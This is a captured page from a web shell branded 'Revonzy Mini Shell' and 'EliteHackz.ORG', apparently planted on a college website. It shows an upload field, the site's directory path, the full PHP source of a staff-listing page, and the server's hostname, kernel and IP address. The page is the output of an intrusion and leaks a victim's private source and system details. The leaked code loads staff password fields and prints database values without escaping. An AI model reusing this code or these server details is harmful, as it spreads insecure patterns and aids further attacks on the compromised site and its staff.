Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/www/rpcollege.edu.in/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/www/rpcollege.edu.in/staff-profile-list.php

<?php
require_once("admin/lib/functions.php");
	$db = new login_function();
?>

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	 <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
    <!-- The above 4 meta tags *must* come first in the head; any other head content must come *after* these tags -->

    <!-- Title -->
    <title></title>

    <!-- Favicon -->
    <link rel="icon" href="img/core-img/favicon.ico">

    <!-- Core Stylesheet -->
    <link rel="stylesheet" href="style.css">
	<style>
body {
  
}

@media only screen and (max-width: 600px) {
  .img {
   width:20px;
   height:20px;
  }
}
.contact_to_staff_tbl tr td
{
    text-align:center;
	padding:2px;
	border:1px solid #DFDFDF;
	
	font-family:Montserrat Alternates;
}
.th_s
{
	font-weight:bold;
	text-align:center;
}
.tab_table {
	  margin:0px;
	  width:100%;
  }
	.tab_data
	{
		background:#880015;
		font-weight:bold;
		font-size:16px;
		color:white;
		border-right:1px solid black;
		text-align:center;
	}
	tr td
	{
		padding:10px;
		border:1px solid black;
		text-align:center;
		
		font-size:17px;
	}
	th 
	{
		padding:10px;
	}
	.sp_img
	{
		height:200px;
		width:100%;
		border:0px solid #blue;
		margin-bottom:5px;
		border:1px solid #DFDFDF;
		 border-radius: 1rem;
	}
	.sp_link_title
	{
		background:none; border:0px; color:GREEN; text-decoration:none; float:right;
		font-family:Cambria;
		font-size:17px;
	}
.card {
    position: relative;
    display: -ms-flexbox;
    display: flex;
    -ms-flex-direction: column;
    flex-direction: column;
    min-width: 0;
    word-wrap: break-word;
    background-color: #FFFFFF;
    background-clip: border-box;
    border: 1px solid rgba(0,0,0,.125);
    border-radius: 1rem;
	margin:20px !important;
	box-shadow:1px 1px 3px 3px #1894CA;
	height:350px !important;
}
h5 
{
   text-align:left !important;
    color: black;
    font-weight: bold;
	font-family: 'Muli', sans-serif !important;
	color:black !important;
	font-size:16px;
}
h4 {
    color: black;
	 text-align:left !important;
    font-family: 'Muli', sans-serif !important;
	color:black !important;
	font-size:15px;
	font-weight: normal !important;
}
</style>
</head>

<body>
    <!-- ##### Preloader ##### -->
    <div id="preloader">
        <i class="circle-preloader"></i>
    </div>

    <!-- ##### Header Area Start ##### -->
   <?php
	include('header.php');
   ?>
    <!-- ##### Header Area End ##### -->

    <div class="breadcumb-area bg-img" style="background-image: url(img/bg-img/breadcumb.jpg);">
        <div class="bradcumbContent">
            <h2>Our College Faculty</h2>
        </div>
    </div>
    <!-- ##### Breadcumb Area End ##### -->

    <!-- ##### About Us Area Start ##### -->
   <section class="about-us-area mt-50 section-padding-100" style="min-height:300px;">
       	<?php
					$print_counter=0;
					$staff_data =   array();
					$appionment_date="";
					$type   =   "Teaching Staff";
					
					$report_details =   $db->get_all_staff_info_by_type($type);
					
				    if(!empty($report_details))
					{
						$counter =0;
						foreach($report_details as $record)
						{
							$id				=	$report_details[$counter][0];
							$full_name		=	$report_details[$counter][1];
							$last_name		=	$report_details[$counter][2];
							$department		=	$report_details[$counter][3];
							$gender			=	$report_details[$counter][4];
							$address		=	$report_details[$counter][5];
							$dob			=	$report_details[$counter][6];
							$contact_no		=	$report_details[$counter][7];
							$email_id		=	$report_details[$counter][8];
							$password		=	$report_details[$counter][9];
							$image			=	$report_details[$counter][10];
							$qualification	=	$report_details[$counter][11];
							$designation	=	$report_details[$counter][12];
							$appionment_date=	$report_details[$counter][13];
							$staff_profile	=	$report_details[$counter][14];
				    ?>
		 <div class="col-lg-2 col-xs-6 card">
		 <?php
		 if($image!="")
		 {
		 ?>
		  <img src="/profile-picture/<?php echo $image; ?>" class="sp_img card-img-top" alt="...">
		 <?php
		 }
		 else
		 {
		?>
		<img src="/images/profile.png" class="sp_img card-img-top" alt="...">
		<?php
		 }
		 ?>
		  <div class="card-body">
			<h5 class="card-title"><?php echo $full_name; ?></h5>
			<h4 class="card-title"><?php echo $designation; ?></h4>
			<h4 class="card-title"><?php echo $department; ?></h4>
		<?php
		if($staff_profile!="")
		 {
		?>
			<center><a href="/profile-picture/<?php echo $staff_profile; ?>" class="btn btn-primary" style="color:white;font-size:16px;" target="_blank">View Profile</a> </center>
		<?php
		 }
		 else
		 {
		?>
		<center><a href="#" class="btn btn-primary" style="color:white;font-size:16px;">View Profile</a> </center>

		<?php
		 }
		?>
		  </div>
		</div>
<?php		
							$print_counter++;
							$counter++;					
					    }
					}
					?>
    <!-- ##### Features Area Start ##### -->

		
        </div>
    </section>
    
    
    
    
    
    
    
    <!-- ##### About Us Area End ##### -->

    <!-- ##### Team Area Start ##### -->
  
    <!-- ##### Footer Area Start ##### -->
    <?php
		include('footer.php');
	?>
    <!-- ##### Footer Area Start ##### -->

    <!-- ##### All Javascript Script ##### -->
    <!-- jQuery-2.2.4 js -->
    <script src="js/jquery/jquery-2.2.4.min.js"></script>
    <!-- Popper js -->
    <script src="js/bootstrap/popper.min.js"></script>
    <!-- Bootstrap js -->
    <script src="js/bootstrap/bootstrap.min.js"></script>
    <!-- All Plugins js -->
    <script src="js/plugins/plugins.js"></script>
    <!-- Active js -->
    <script src="js/active.js"></script>
</body>

</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4